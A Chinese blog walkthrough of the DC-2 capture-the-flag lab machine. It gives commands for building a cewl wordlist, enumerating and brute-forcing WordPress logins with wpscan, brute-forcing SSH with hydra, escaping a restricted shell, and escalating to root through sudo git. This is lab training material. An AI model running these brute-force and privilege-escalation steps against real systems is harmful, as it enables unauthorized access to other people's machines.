DC-2 入门练习

最新推荐文章于 2021-10-03 12:30:19 发布
最新推荐文章于 2021-10-03 12:30:19 发布
阅读量442 收藏 1
点赞数 3
分类专栏: DC DC-2 文章标签: 网络安全 渗透测试 靶机练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_helloword/article/details/107339490
版权
DC 同时被 2 个专栏收录
8 篇文章 0 订阅
订阅专栏
DC-2
1 篇文章 0 订阅
订阅专栏

*DC-2

1. 准备工作:

创建好DC-2靶机
查看网络配置以及MAC地址(为后面扫描找ip准备)![在这里插入图片描述](https://img-blog.csdnimg.cn/20200714153731621.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01yX2hlbGxvd29yZA==,size_16,color_FFFFFF,t_70)

2. 扫描内网找到靶机ip

在这里插入图片描述

3. 找到ip,信息收集(80端口,和ssh端口开放)

在这里插入图片描述
登录访问80端口发现flag1
在这里插入图片描述

4. 根据提示利用cewl制作一个密码字典

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。(简单来讲就是爬行网站,搜集相关信息制作字典)

cewl  cd-2 >pwd.dic
  1. 利用美少妇(msfconsole)进行网站目录扫描(其他工具也可以)
use auxiliary/scanner/http/dir_scanner

set RHOSTS 192.168.1.10

set THREADS 50

exploit

在这里插入图片描述
5.wpscan爆破网站

wpscan --url dc-2 -U user.dic -P pwd1.dic
wpscan --url dc-2 -e u

扫描网站存在用户然后制作user.dic用户名字典
在这里插入图片描述
利用字典爆破出登录用户名密码
在这里插入图片描述

6. 登录后台找到flag2

在这里插入图片描述
在这里插入图片描述

7.hydra爆破ssh登录

根据flag2的提示,我们要找到其他方法拿到flag,这里想到ssh端口于是利用ssh远程爆破

hydra -L user.dic -P pwd.dic ssh://192.168.1.10 -s 7744 -o hydra.ssh -vV     //hydra暴力破解
ssh tom@192.168.1.162 -p 7744                                      //远程登录

sydra爆破成功后用tom用户远程登录,查看目录发现flag3,但是无法查看:
在这里插入图片描述
在这里插入图片描述

8. 绕过限制

(执行命令发现 command not found,这是因为ssh远程连接到服务器的环境变量中不包含对应可执行文件的路径需要自行添加 )

BASH_CMDS[a]=/bin/sh;a

/bin/bash

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

如下:

在这里插入图片描述
根据flag3的提示,我们切换到jery用户,然后查看家目录,发现flag4但是无权访问这也意味着下一步需要提权

9. 提权

根据提示我们需要用到git命令,这里和dc-1提权类似,利用具有root权限的命令
1.查看具有root权限

sudo -l

在这里插入图片描述
2. git提权,强制进入交互式状态,让页面缓冲区无法显示全部信息

sudo git -p --help
!/bin/bash

在这里插入图片描述
成功找到flag
在这里插入图片描述

DC靶机系列入门详解,关注查看下一篇

参考资料:千锋网络安全教程
如有不足请指出

Mr H
关注
专栏目录
dc-2靶场练习
qq_49518993的博客
09-27 542
dc-2靶场练习
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开在7744端口上,使用爆破得到的账号密码进行登录,tom登陆成功,在tom主目录下找到flag3 绕过tom的rbash限制,切换到jerry用户,在主目录发现flag4 使用jerry用户通过git提权,进入root目录找到final_flag
靶机渗透测试实战(二)——DC-2
weixin_45116657的博客
10-03 5355
1、确定目标主机、详细信息 1.1> 命令:arp-scan -l ——> 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) arp-scan命令: 是一个用来进行系统发现的ARP命令行扫描工具(可以发现本地网络中的隐藏设备)。它可以构造并发送ARP请求到指定的IP地址,并且显示返回的任何响应。 arp-scan 可以显示本地网络中的所有连接设备,即使这些设备有防火墙。设...
DC搭建
夜邢的博客
12-29 978
域控搭建 DC搭建
[CTF challenge] DC-2
OUTOFTEN的博客
01-31 528
点击下载靶机 环境:vm虚拟机、kali 2019.4、桥接网络模式。 kali开机,dc-1开机。 step1.在kali中打开终端输入ifconfig命令查看自己在的网段 step2.老规矩,用nmap扫描一下自己网段内的主机,发现靶机。这里需要注意的是“Did not follow redirect to http://dc-2/”这里有个重定向的问题,这时,直接通过IP地址访问靶机...
DC-5入门练习
Mr_helloword的博客
07-20 588
DC-5靶机渗透 1. 信息收集 1.查看dc-5主机mac地址 2. nmap扫描 nmap -sP 192.168.1.0/24 -oN nmap.sP nmap -A 192.168.1.6 -p 0-6635 -oN nmap.A 发现目标靶机地址为192.168.1.6 查看目标主机开放那些端口 由于开发80我们登录随便看一看 这些网站页面都放在根目录下,我们可以用御剑扫描后台,发现最后一个页面这里可以提交表单,参数(都显示在url里) 发现每次刷新网页下面都会变化 2.御剑扫描
DC-3入门练习
Mr_helloword的博客
07-15 697
EXP资源 链接:https://pan.baidu.com/s/1AeuJrP-T6elka5aZP9KL9g 提取码:0fkw
DC-1入门练习
Mr_helloword的博客
07-10 876
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
华为HCIE-DC培训视频汇总集【共40集】.rar
09-09
HCIE-DC-34-华为TRILL部署模型及eNSP练习 HCIE-DC-35-华为VXLAN技术入门 HCIE-DC-36-华为VXLAN技术细节 HCIE-DC-37-华为VXLAN部署模型-网关选择 HCIE-DC-38-华为VXLAN部署模型-集中式网关配置案例 HCIE-DC-39-...
dsc-seaborn-lab-dc-ds-021720
03-29
在本实验中,我们将使用第二个更高级的可视化库Seaborn进行一些练习。 目标 你将能够: 使用Seaborn的预建功能构建地块 入门 在本实验中,我们将探索可以使用Seaborn创建的几种不同类型的可视化。 Seaborn建立在...
css-essentials-css-issue-bot-9000-dc-web-120919
02-27
让我们练习使用W3CCSS验证器! 入门 将此课程分叉并克隆到您的本地环境中。 导航到终端中的目录,然后运行code . 在Visual Studio Code中打开文件。 最后,运行bundle安装实验室的依赖项。 继续运行rspec ,以查看...
2021-06-24CTF-攻防世界-WEB新手练习区(12题入门题)
u258710的博客
06-24 2584
CTF-攻防世界-WEB新手练习区(12题入门题)01-view_source02-robots03-backup04-cookie05-disabled_button06-weak_auth07-simple_php08-get_post09-xff_referer10-webshell11-command_execution12-simple_js 01-view_source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 题目提示查看网页源代码,但鼠标右键不管用
数字 IC 技能拓展(29)浅谈 DFT 与扫描链
新芯设计的博客
10-03 7732
数字 IC 技能拓展(29)浅谈 DFT 与扫描链
DC-4入门练习
Mr_helloword的博客
07-17 1961
DC-4靶机渗透
DC-9入门练习
Mr_helloword的博客
07-27 1587
1. 信息收集 1.1nmap扫描 nmap -sP 192.168.1.0/24 -oN nmap.sP nmap -A 192.168.1.4 -p 0-65535 -oN nmap.A 1.2指纹识别 火狐插件wappalyzer查看 whatweb 192.168.1.4 1.3扫描网站目录后台 dirb扫描: dirb http://192.168.1.4 发现两个 御剑扫描后台: 1.4访问80 发现可能存在sql注入,但是url无参数变化 2.爆表 2.1burpsuit
DC-6入门练习
Mr_helloword的博客
07-20 457
信息收集 1.nmap扫描 扫描网段 nmap -sP 192.168.1.0/24 -oN nmap.sP 找到目标靶机的ip 扫描目标ip开放那些端口: nmap -A 192.168.1.11 -p 1-65535 -oN nmap.A 80端口开放访问该地址: 发现无法打开,可能是没有dns缓存 ,我们添加一条记录即可 vim /etc/hosts 192.168.1.11 wordy 2.御剑扫描后台 后台地址为:http://wordy/wp-login.php 3.使用wpsc
DC-8入门练习
Mr_helloword的博客
07-24 415
1. 信息收集 1.查看目标靶机MAC地址 2.nmap扫描地址 nmap -sP 192.168.1.0/24 -oN nmap.sP 3.nmap扫描端口 nmap -A 192.168.1.6 -p 0-65535 -oN nmap.A 目标开放了80/22端口 4.访问80 利用火狐自带软件,查看网站信息:开源cms模板drupal 7 容器:apache 目标端口发放22端口我们可以进行爆破,但是这种成功率较低。 6.寻找SQL注入点 点啊点发现了,网页通过nid传参,我们可以判断是
DC-7入门练习
Mr_helloword的博客
07-21 388
信息收集 1.扫描主机 查看DC-7的mac地址 nmap -sP 192.168.1.0/24 -oN nmap.sP 找到目标ip为192.168.1.6 2.扫描端口 nmap -A 192.168.1.6 -p 0-65535 -oN nmap.A 开放80,22端口 3.收集网站信息 whatweb 192.168.1.6 使用Drupal 8搭建的网站 我们用kali查找有无drupal 8的漏洞 最后尝试无果 4.访问80 根据提示爆破是行不通的 重点看首页的footer
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值